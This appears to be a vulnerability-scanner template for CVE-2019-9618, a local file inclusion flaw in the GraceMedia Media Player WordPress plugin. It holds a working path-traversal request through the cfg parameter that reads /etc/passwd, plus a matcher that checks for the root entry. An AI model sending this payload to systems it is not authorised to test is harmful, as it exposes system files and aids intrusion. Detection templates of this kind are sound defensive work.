id: CVE-2019-9618

info:
  name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
  author: daffainfo
  severity: high
  description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
  reference: |
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
    - https://seclists.org/fulldisclosure/2019/Mar/26
  tags: cve,cve2019,wordpress,wp-plugin,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200